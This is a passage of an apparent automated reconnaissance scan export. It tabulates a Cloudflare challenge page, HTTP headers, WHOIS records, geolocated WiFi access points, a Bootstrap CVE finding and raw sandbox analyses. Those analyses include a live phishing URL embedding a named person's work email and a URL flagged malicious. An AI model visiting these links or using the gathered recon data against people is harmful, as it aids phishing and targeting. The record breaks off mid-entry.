Z-KgdWRayYvkrBZh1irLAwBozTjJSzJVowS3-M9iXqAD-o4GZBMK9eAUQlmuEIIQAf4f1TCN4loJA-4yETDBP4eorxfgJm9hdR63VxYMIHAkqccOTphwj01rk_8nG1uU4rJrScaAyK8AS_kQ2UytoRgp8VoNR_d7rmE_GZgpIDjlZ7mYr5nvR22Zau-p4gmFaOvdsk2jjUaqisfuqgg6D7ilZ29ja7S9UD52x-HqjxmP4JRdKMs3zwtM2aBKs0yMaMXiLr0T0j3f1FktvbG7soBZaonR97fM1qjr28AlqpELx3WuIvTiKLBZ2gxE_Tjenn0-IC2XQdN8IEIXfw9F7jVJZ6FyGJ9Yx4YqJ3kmX0qXi9iX1jb-Y3YZwJ6j4tTSRr8_tAhbW33UaKc3ULwKwGZ9g9Ru0mgnq0hVusSVy31FLGpM6QZZ4iZhokIoEs5L-lSF6-Qt-6-GQgAAhgrRM_mFp17cJjzl0kVV9PTe5Y-EYxGWlJKX7FVEGARcAfwWh_GITW_xYClIpKaR9CMUgzm4MqfOkVCd-6Z7AHBczBYiCIlRejFdx7yIdIPo__-pVcOwTW-jE9Y6Ncj1gf1h">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '12933',
cRay: '7c5f60715ea2423d',
cHash: '4c530bdfb62a335',
cUPMDTk: "\/?__cf_chl_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'TOYbkC9rgCOmr8G89iiZTp2nx3xahTKUWPvvRReOro8JJJL4fq23OOGaFt6uHWiVLv9ABlTzh5akOOr2iBc53fzTOjW4K5sc+Aw6LUirtlJizLJHy/2vFLg/egZuLvz4Jk1sjjx3a/wkUOpJytZhNSfbkgf1KJELFbBUDkPz+PDulg0Nr57X1+oFwk+MMf/JnTKFf63zzoaJCmg1UGm5a8QRiSNvGBM7/i8bWTpF39rRrej+fONG8+Xfj87ptGWoEpG+c7Okgjh50kVvVQ1MM2KNt9Wf0uYN3Y5L83KgO0XjOeom2ZbKiTxcFZ+mcfEnOH7y4gawPSo1rxstuxKlhzZzfeOfN4VyUmxDs0BnYa2jrym4m5FzCmfrBBJJ1wCoAVXGMuoymG/pQ4+/22Y5ByC1Z8p7u74Rp83gpUfEv8bmNvjC33vYku3SIvYOYc5AdNT18IswGxpIjLbRTT8QLo1fadzodr50qCzr5X5Vi06KH6SQu3sOWSfwXNxLiQrSqFvCVjlirKim8KagkYwrflhXda6MuRH8Nh6ZQFP87/eO2YkXCpF9UX1MgEu6CzGx',
t: 'MTY4Mzg2MDA2Mi45MzcwMDA=',
m: 'LwOsDwqRkfr0bjyiLObl7sEK+vITUZuaPQE/A6GDF60=',
i1: 'zy3+9oq0kQS8g0MofYLvVQ==',
i2: 'Pt5t/C6ZQh8wsZRxhTvpYw==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60715ea2423d');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60715ea2423d';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| www.ayhu.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B2wOcEimTwCYfDusQJnMA%2FeK3vnM4eWqJiKh4VAlhBD7SojZQVBe5%2BjFuHyHRbHO%2Fn1YBpE8RMXaJKVCk4v6MFKYjpbskikkKfgZLcaIJXgS5DpvLqiKf9pQvDmc23XPqbwOHpZdXJ%2FG"}],"group":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=B2wOcEimTwCYfDusQJnMA%2FeK3vnM4eWqJiKh4VAlhBD7SojZQVBe5%2BjFuHyHRbHO%2Fn1YBpE8RMXaJKVCk4v6MFKYjpbskikkKfgZLcaIJXgS5DpvLqiKf9pQvDmc23XPqbwOHpZdXJ%2FG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f60465c67192a-EWR"} |
| 2023-05-12 03:03:21 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-th.github.io |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.229): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | joe2-suddenlink_sucks (Net ID: 58:19:F8:9D:C6:A0) | 37.751, -97.822 |
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.184): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:46:03 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://htmlpreview.github.io/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_afc_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2812"\n "IsoScope_afc_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_afc_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_afc_IE_EarlyTabStart_0xb00_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_afc_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_afc_ConnHashTable<2812>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2812"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:80"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"htmlpreview.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"htmlpreview.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002812]\n "~DFFF9DB304E6B28BC8.TMP" has type "data"- Location: [%TEMP%\\~DFFF9DB304E6B28BC8.TMP]- [targetUID: 00000000-00002812]\n "~DFA7F6F2C445876411.TMP" has type "data"- Location: [%TEMP%\\~DFA7F6F2C445876411.TMP]- [targetUID: 00000000-00002812]\n "~DF978321BDA8C8F83B.TMP" has type "data"- Location: [%TEMP%\\~DF978321BDA8C8F83B.TMP]- [targetUID: 00000000-00002812]\n "~DFDDB9EA759F9F439A.TMP" has type "data"- Location: [%TEMP%\\~DFDDB9EA759F9F439A.TMP]- [targetUID: 00000000-00002812]\n "_546FF341-D397-11ED-B4FB-0800272B9531_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._546FF33F-D397-11ED-B4FB-0800272B9531_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "htmlpreview_1_.js" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "_79B3E1B8-D398-11ED-B4FB-0800272B9531_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_5B37F14E-D397-11ED-B4FB-0800272B9531_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "urlref_httphtmlpreview.github.io" has type "HTML document ASCII text"- [targetUID: N/A]\n "UI3DAOT0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UI3DAOT0.txt]- [targetUID: 00000000-00002968]\n "KDZQANEF.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\KDZQANEF.txt]- [targetUID: 00000000-00002812]\n "4V6LDXNK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4V6LDXNK.txt]- [targetUID: 00000000-00002812]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "MCXUEQXC.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\MCXUEQXC.txt]- [targetUID: 00000000-00002968]\n "ARJOOR8H.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ARJOOR8H.txt]- [targetUID: 00000000-00002812]\n "LYJDCX59.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LYJDCX59.txt]- [targetUID: 00000000-00002812]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-62', u'name': u'Communicates with HTTP webserver (GET/POST requests)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Found http requests in header "GET /"\n Found http requests in header "GET /htmlpreview.js"\n Found http requests in header "GET /favicon.ico"\n Found http requests in header "GET /?"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://htmlpreview.github.io/"\n Pattern match: "http://htmlpreview.github.io"\n Pattern match: "https://api.codetabs.com/v1/proxy/?quest=\'];return"\n Heuristic match: "if (src.indexOf(\'//raw.githubusercontent.com\') > 0 || src.indexOf(\'//bitbucket.org\') > 0) { //Check if it\'s from raw.github.com or bitbucket.org"\n Heuristic match: "if (href.indexOf(\'//raw.githubusercontent.com\') > 0 || href.indexOf(\'//bitbucket.org\') > 0) { //Check if it\'s from raw.github.com or bitbucket.org"\n Pattern match: "https://api.codetabs.com/v1/proxy/?quest="\n Pattern match: "SUIDMmicrosoft.com/9216256238860831025177145958099031025060*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=202201"\n Pattern match: "https://github.com/user/repo/blob/master/index.html"\n Pattern match: "https://github.com/niutech"\n Pattern match: "SUIDMmicrosoft.com/9216256238860831025177145958099031025060*MUID3057AB3DCDCB69982AA2B9D7CC4F6801microsoft.com/1025269487782431103531145958099031025060*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA6"\n Pattern match: "MUID0535B3A0912C6ADF1009A14A90606BF1msn.com/1025269487782431103531146379974031025060*"\n Pattern match: "MUIDB3057AB3DCDCB69982AA2B9D7CC4F6801ieonline.microsoft.com/9216269487782431103531145973724031025060*"\n Pattern match: "SUIDMmicrosoft.com/9216256238860831025177145958099031025060*MUID3057AB3DCDCB69982AA2B9D7CC4F6801microsoft.com/1025269487782431103531145958099031025060*_EDGE_V1microsoft.com/9216269487782431103531145989349031025060*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: "isdomainmigratedtruewww.msn.com/1025358829734431061286146364349031025060*"\n Pattern match: "www.msn.com/"\n Heuristic match: "htmlpreview.github.io"\n Pattern match: "http://htmlpreview.github.io/Accept-Language"\n Pattern match: ".gith0.io/?httpg://gith0.co_twb9tboot9traptblobtgh-page9/2.3.2tindex.ht_"\n Heuristic match: "tmlpreview.github.io"\n Pattern match: "http://www.windows.com/pctv"\n Pattern match: "http://go.microsoft.com/fwlink/?linkid=53081"\n Pattern match: "www.microsoft.com/extender/help"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwl"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=70599"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=145837"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkID=57190"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=145765"\n Heuristic match: "Example: computer.fabrikam.com"\n Pattern match: "vista.gallery.microsoft.com/vista/SideShow.aspx"\n Pattern match: "http://www.icra.org/vocabulary/"\n Pattern match: "wmploc.dll/Offline_Buy.htm\'res://wmploc.dll/Offline_MediaGuide.htm*res://wmploc.dll/Offline_Subscriptions.htm"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=32146res://wmploc.dll/ICW_ErrorPage.htm"\n Pattern match: "wmploc.dll/Service_Initial.htm"\n Pattern match: "wmploc.dll/Error_ServiceInfo.htm\'res://wmploc.dll/Offline_InfoCenter.htm&res://wmploc.dll/Offline_AlbumInfo.htm"\n Pattern match: "wmploc.dll/Service_NoFunc.htm%res://wmploc.dll/Service_No_Local.htm"\n Pattern match: "wmploc.dll/RT_IMAGE/ServiceLarge.p | 185.199.111.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | yigitcan (Net ID: 00:13:49:EC:E1:85) | 40.2024, 29.0398 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomE65548 (Net ID: 00:0C:F6:E6:55:48) | 50.8897, 6.0563 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | Austria | beatrixhaller.at |
| 2023-05-12 03:09:13 | Vulnerability - General | Yes | Tool - Retire.js | 0 | 0 | 4 | 0 | None | CVE-2018-14041
Score: Unknown
Description: Unknown | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js |
| 2023-05-12 03:15:09 | Similar Domain - Whois | No | Whois | 2 | 0 | 2 | 0 | None | Domain Name: battleb0t.wtf
Registry Domain ID: 210affc107bd4562ba433c931d79c2d0-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com/
Updated Date: 2023-02-15T17:41:17Z
Creation Date: 2023-02-10T17:40:28Z
Registry Expiry Date: 2024-02-10T17:40:28Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:15:08Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain name: battleb0t.wtf
Registry Domain ID: 210affc107bd4562ba433c931d79c2d0-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2023-02-10T17:40:28.99Z
Registrar Registration Expiration Date: 2024-02-10T17:40:28.99Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T13:15:09.13Z <<<
For more information on Whois status codes, please visit https://icann.org/epp | battleb0t.wtf |
| 2023-05-12 02:45:57 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 4 | 0 | None | 39.0469, -77.4903 | 2600:1f18:2489:8202::c8 |
| 2023-05-12 02:44:29 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | github.com | www.github.com |
| 2023-05-12 03:24:29 | Company Name | No | Company Name Extractor | 0 | 0 | 4 | 0 | None | Netlify\, Inc | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app |
| 2023-05-12 02:54:35 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}, {u'url': u'https://zip.co/us/quadpay-terms-of-service', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 31, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fheineken.com%2Fjurgen.mulder%40heineken.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:7548:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7548:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "InternetShortcutMutex"\n "Local\\SM0:7436:304:WilStaging_02"\n "SM0:7436:304:WilStaging_02"\n "SM0:7436:120:WilError_01"\n "Local\\SM0:7436:120:WilError_01"\n "SM0:7548:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "Local\\SM0:7548:304:WilStaging_02"\n "Local\\SM0:7548:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7548:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7548:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "172.66.40.106:443"\n "185.88.152.184:443"\n "35.186.254.174:443"\n "104.18.11.207:443"\n "172.67.71.45:443"\n "172.217.12.99:443"\n "142.251.214.131:443"\n "20.50.80.209:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "rabetsanatkoosha.com"\n "track.salesflare.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlref_httpsllink.tou_https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fheineken.com%2Fjurgen.mulder%40heineken.com" as clean (type is "HTML document ASCII text")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n 